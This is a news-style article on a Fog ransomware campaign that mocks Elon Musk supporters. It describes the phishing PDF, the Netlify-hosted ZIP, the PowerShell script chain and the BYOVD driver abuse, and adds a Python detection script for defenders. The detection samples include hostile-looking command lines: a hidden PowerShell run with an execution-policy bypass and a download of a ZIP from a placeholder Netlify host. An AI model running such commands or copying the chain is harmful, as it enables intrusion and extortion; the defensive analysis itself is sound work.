Cybersecurity experts have uncovered a sophisticated ransomware campaign that specifically targets and mocks supporters of Elon Musk. This attack uses advanced PowerShell scripts and payloads hosted on the Netlify platform to deliver its malicious code.
Attack Overview
The ransomware, identified as a variant of the Fog Ransomware family, blends financial motives with political satire. Its ransom note impersonates an individual named “Edward Coristine,” who is allegedly linked to the DOGE cryptocurrency initiative. Unusually, the note lists government email addresses as technical support contacts and includes mocking messages aimed at Musk’s followers.
When executed, the malware opens a YouTube video that ridicules Elon Musk. This serves both as a distraction and as a reinforcement of the attack's parodic nature.
Infection Method and Technical Details
Researchers at KrakenLabs traced the infection to phishing emails containing PDF attachments titled "Pay Adjustment." Opening the PDF directs victims to a Netlify-hosted ZIP archive. This archive deploys a chain of PowerShell scripts starting with Pay.ps1, which coordinates the attack.
The infection chain is complex. It uses .lnk file droppers and multiple stages of PowerShell execution. Key components include:
- cwiper.exe – the main ransomware encryptor
- ktool.exe – uses the Bring Your Own Vulnerable Driver (BYOVD) technique with an Intel driver to gain kernel-level access
- PowerShell scripts for reconnaissance and persistence
One of the most technically advanced scripts, trackerjacker.ps1, uses XOR-based obfuscation to avoid detection. After decoding, it performs system reconnaissance. Another script, lootsubmit.ps1, collects geolocation data using the Wigle API.
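The chain described above can be triaged from process-creation telemetry. The following detection logic is an added example written for this article, not code from KrakenLabs or the campaign; it assumes Sysmon-style fields (parent image, image, command line), constructed sample events, a placeholder Netlify host, and the common .lnk-dropper heuristic of explorer.exe launching a hidden PowerShell with an execution-policy bypass.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    # One process-creation record; field names modelled on Sysmon Event ID 1
    parent: str   # parent image name, e.g. explorer.exe
    image: str    # launched image name
    cmdline: str  # full command line

# Indicators named in the campaign description: script names, binaries, hosting
CHAIN_SCRIPTS = ("pay.ps1", "trackerjacker.ps1", "lootsubmit.ps1")
CHAIN_BINARIES = ("cwiper.exe", "ktool.exe")
PS_IMAGES = ("powershell.exe", "pwsh.exe")
NETLIFY_ZIP_RE = re.compile(r"https?://[\w.-]*netlify\.app/\S*\.zip", re.I)

def classify(ev: ProcEvent) -> list[str]:
    """Return the reasons an event matches the described chain (empty if none)."""
    par, img, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    reasons = []
    if img in PS_IMAGES:
        # explorer.exe -> hidden PowerShell with policy bypass is the usual .lnk dropper shape
        if par == "explorer.exe" and "-w hidden" in cmd and "bypass" in cmd:
            reasons.append("hidden PowerShell from explorer.exe (.lnk dropper pattern)")
        reasons += [f"known chain script {s}" for s in CHAIN_SCRIPTS if s in cmd]
        if NETLIFY_ZIP_RE.search(ev.cmdline):
            reasons.append("ZIP fetched from a Netlify-hosted URL")
    elif img in CHAIN_BINARIES and par in PS_IMAGES:
        reasons.append(f"PowerShell spawned {img}")
    return reasons

def find_chain_hits(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Triage a batch of events; returns (index, reasons) for every matching event."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]

# Constructed sample telemetry (not real logs); the host name is a placeholder
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              r'powershell.exe -w hidden -ep bypass -f C:\Users\u\Downloads\pay\Pay.ps1'),
    ProcEvent("powershell.exe", "powershell.exe",
              r'powershell.exe -ep bypass -f C:\Users\u\AppData\Local\Temp\trackerjacker.ps1'),
    ProcEvent("powershell.exe", "powershell.exe",
              'powershell.exe -c "iwr https://PLACEHOLDER-site.netlify.app/pay.zip -o pay.zip"'),
    ProcEvent("powershell.exe", "cwiper.exe", r'C:\Users\u\AppData\Local\Temp\cwiper.exe'),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe"),   # benign interactive shell
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]
```

Running `find_chain_hits(SAMPLE_EVENTS)` flags the first four events and leaves the benign shell and svchost untouched; in production the same rules belong in an EDR or SIEM query rather than a script.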
Financial Motive Behind the Satire
Despite its mocking tone, the ransomware demands payment in Monero cryptocurrency, confirming its financial intent. The ransom note demands around $1,000 and instructs victims to provide five bullet points detailing their work accomplishments from the previous week. It also threatens a penalty of “a trillion dollars” if the victim fails to comply.
The attackers claim they will decrypt files for free only if victims help spread the ransomware to new targets, adding a viral element to the attack.
Psychological and Technical Sophistication
This campaign is a notable example of how ransomware groups now combine psychological manipulation with technical skill. By targeting a politically charged audience and embedding satire, the attackers aim to confuse and distract victims while executing their malicious payload.
The infection begins simply with a phishing PDF, but the underlying attack involves a multi-stage PowerShell script chain and kernel-level exploits. This level of sophistication highlights the evolving threat landscape where financial crime and political trolling intersect.
“FOG ransomware is a relatively new family that organizations should monitor closely,” cybersecurity analysts warn. “Its combination of political mockery and financial extortion represents a new trend in ransomware tactics.”
Victims are urged to exercise caution with unexpected email attachments, especially those claiming to contain pay or work adjustment information, as these remain a common vector for ransomware infections.